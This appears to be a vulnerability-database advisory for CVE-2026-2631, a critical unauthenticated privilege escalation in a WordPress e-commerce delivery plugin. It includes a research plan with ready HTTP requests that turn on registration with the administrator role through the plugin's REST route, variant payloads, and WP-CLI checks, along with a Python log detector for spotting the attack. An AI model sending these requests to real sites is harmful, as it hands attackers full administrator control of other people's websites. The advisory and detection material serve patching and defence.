CVE-2026-2631

Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - Unauthenticated Privilege Escalation

Weakness: Improper Privilege Management
Severity: critical
CVSS Score: 9.8
Patched in: 2.6.60
Time to patch: 8d

Description

The Datalogics Ecommerce Delivery – Datalogics plugin for WordPress is vulnerable to privilege escalation in all versions before 2.6.60 (2.6.60 is the patched release). This makes it possible for unauthenticated attackers to elevate their privileges to those of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: < 2.6.60
Published: March 12, 2026
Last updated: March 19, 2026
Affected plugin: datalogics

What Changed in the Fix

Changes introduced in v2.6.60


Source Code

WordPress.org SVN
Research Plan (status: Unverified)


Research Plan: CVE-2026-2631 Unauthenticated Privilege Escalation in Datalogics

1. Vulnerability Summary

The Datalogics Ecommerce Delivery plugin for WordPress is vulnerable to unauthenticated privilege escalation via its REST API. The plugin registers several REST routes under the namespace datalogics-0/v1 (derived from the datalogics_ID constant). These routes, specifically /update-settings/ and /update-token/, utilize a permission callback named datalogics_permission_check.

The working hypothesis is that datalogics_permission_check returns true for unauthenticated requests, and that datalogics_update_settings passes caller-supplied keys straight to update_option() without an allowlist or validation. If both hold, an attacker can set the core options users_can_register and default_role, which enables public registration and grants every newly registered account the administrator role.

2. Attack Vector Analysis

  • Endpoint: POST /wp-json/datalogics-0/v1/update-settings/
  • Alternative Endpoint: POST /wp-json/datalogics-0/v1/update-token/ (if the primary route rejects the request, a successful write here still confirms that the permission callback can be passed without authentication).
  • Namespace: datalogics-0/v1 (Based on define('datalogics_ID','0'); in datalogics.php).
  • Authentication: Unauthenticated.
  • Preconditions: The plugin must be active.
  • Payload: A JSON object containing WordPress core options:
    • users_can_register: 1
    • default_role: administrator
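The attack vector above gives a defender everything needed to spot exploitation in web server logs. The following detection logic is an added example, not part of the advisory or the plugin: it parses combined-format access log lines, flags any POST to the two write routes (in both the /wp-json/ and ?rest_route= forms), grades a 200 as high and a rejected call (401/403, what a patched permission callback returns) as medium, and raises a critical alert when the same client then POSTs to the registration form within a short window. The log lines are constructed for the example; the route paths are the ones the plan infers.

```python
import re
from datetime import datetime, timedelta

# Write routes the plan identifies, in pretty-permalink and ?rest_route= forms.
WRITE_ROUTE = re.compile(
    r"^(?:/wp-json/datalogics-0/v1/|/\?rest_route=(?:/|%2F)datalogics-0(?:/|%2F)v1(?:/|%2F))"
    r"(?:update-settings|update-token)\b")
REGISTER = re.compile(r"^/wp-login\.php\?(?:.*&)?action=register(?:&|$)")
# Apache/nginx "combined" log format: ip ident user [ts] "METHOD path proto" status ...
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample: one full chain, one benign REST read, one call rejected by a
# patched site, and one unrelated registration.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2026:10:15:01 +0000] "POST /wp-json/datalogics-0/v1/update-settings/ HTTP/1.1" 200 17 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2026:10:15:05 +0000] "POST /wp-json/datalogics-0/v1/update-token/ HTTP/1.1" 200 17 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2026:10:15:08 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.4 - - [12/Mar/2026:10:16:40 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.33 - - [12/Mar/2026:10:40:00 +0000] "POST /?rest_route=/datalogics-0/v1/update-settings/ HTTP/1.1" 401 96 "-" "curl/8.5.0"
198.51.100.9 - - [12/Mar/2026:11:02:10 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def detect(log_text, window=timedelta(minutes=10)):
    """Two rules: any POST to a write route, and a write accepted (200) followed by a
    registration POST from the same IP within `window`."""
    events = sorted((e for e in map(parse, log_text.splitlines()) if e),
                    key=lambda e: e["ts"])
    alerts, accepted_writes = [], {}          # ip -> timestamps of 200 responses
    for e in events:
        if e["method"] == "POST" and WRITE_ROUTE.match(e["path"]):
            accepted = e["status"] == 200
            alerts.append({"rule": "datalogics_rest_write",
                           "severity": "high" if accepted else "medium",
                           "ip": e["ip"], "ts": e["ts"], "path": e["path"],
                           "status": e["status"]})
            if accepted:
                accepted_writes.setdefault(e["ip"], []).append(e["ts"])
        elif e["method"] == "POST" and REGISTER.match(e["path"]):
            prior = [t for t in accepted_writes.get(e["ip"], [])
                     if timedelta(0) <= e["ts"] - t <= window]
            if prior:
                alerts.append({"rule": "datalogics_privesc_chain", "severity": "critical",
                               "ip": e["ip"], "ts": e["ts"], "write_ts": prior[0]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["severity"].upper(), a["rule"], a["ip"], a["ts"].isoformat())
```

The first rule is the strong signal on its own: a 200 from these routes for a client with no admin session should not happen on a patched site. The chain rule is a heuristic, since an attacker can register from a different address and sites with legitimately open registration see registration POSTs all day; treat it as a prioritisation aid, not the only trigger.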

3. Code Flow

  1. Entry Point: The WordPress REST API receives a POST request to /wp-json/datalogics-0/v1/update-settings/.
  2. Hook Registration: api.php registers the route via the rest_api_init hook in datalogics_register_api_routes().
  3. Permission Check: WordPress calls datalogics_permission_check. If this function returns true for an unauthenticated request (the plan's working assumption), the request proceeds.
  4. Callback Execution: WordPress executes the callback datalogics_update_settings (referenced in api.php).
  5. Sink: The callback (inferred logic) iterates through the provided parameters and calls update_option($key, $value) for each.
  6. Persistence: The users_can_register and default_role options are updated in the wp_options table.

4. Nonce Acquisition Strategy

Based on the api.php file, the REST routes are registered with a permission_callback. The WordPress REST API only consults the X-WP-Nonce header to authenticate cookie-based sessions; an unauthenticated request carries no session cookie, so it is evaluated solely by the route's permission_callback. If that callback returns true, the request is processed with no nonce at all.

The source code does not show any wp_verify_nonce or check_ajax_referer calls inside the REST callbacks. Therefore, this exploit is likely nonce-less.

5. Exploitation Strategy

Step 1: Update WordPress Options

Use the http_request tool to send a POST request to the update-settings endpoint to enable administrator registration.

HTTP Request:

POST /wp-json/datalogics-0/v1/update-settings/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json

{
  "users_can_register": "1",
  "default_role": "administrator"
}

Step 2: Verify Option Change (Internal)

Verify that the options were successfully changed using WP-CLI.

Step 3: Register New Admin User

Send a POST request to wp-login.php to register a new account. Stock WordPress does not accept a password at registration; it e-mails a set-password link to user_email, so the attacker must control that mailbox (the lost-password flow goes to the same address) before logging in as the new administrator.

HTTP Request:

POST /wp-login.php?action=register HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

user_login=attacker_admin&user_email=attacker@example.com&redirect_to=&wp-submit=Register

6. Test Data Setup

  1. Plugin Installation: Ensure the Datalogics plugin (version < 2.6.60) is installed and activated.
  2. Initial State:
    • wp option get users_can_register should be 0.
    • wp option get default_role should be subscriber.

7. Expected Results

  1. The first request to /update-settings/ should return a 200 OK response (or success: true).
  2. The options users_can_register and default_role will be updated in the database.
  3. The registration request will succeed, and a new user attacker_admin will be created.
  4. The user attacker_admin will possess the administrator role.

8. Verification Steps

After performing the HTTP requests, run the following WP-CLI commands to confirm escalation:

# Check if registration was enabled
wp option get users_can_register

# Check if default role was changed
wp option get default_role

# Check the role of the newly created user
wp user list --field=roles --user=attacker_admin

9. Alternative Approaches

If the update-settings endpoint does not accept arbitrary options in a JSON body, try:

  1. Form-Encoded Payload:
    POST /wp-json/datalogics-0/v1/update-settings/ with body users_can_register=1&default_role=administrator.
  2. Target update-token:
    Test if POST /wp-json/datalogics-0/v1/update-token/ with token=pwned works. If it does, the permission_callback is definitely bypassed.
  3. Specific Key Injection:
    Check if the callback expects a nested array, e.g., {"settings": {"default_role": "administrator"}}.
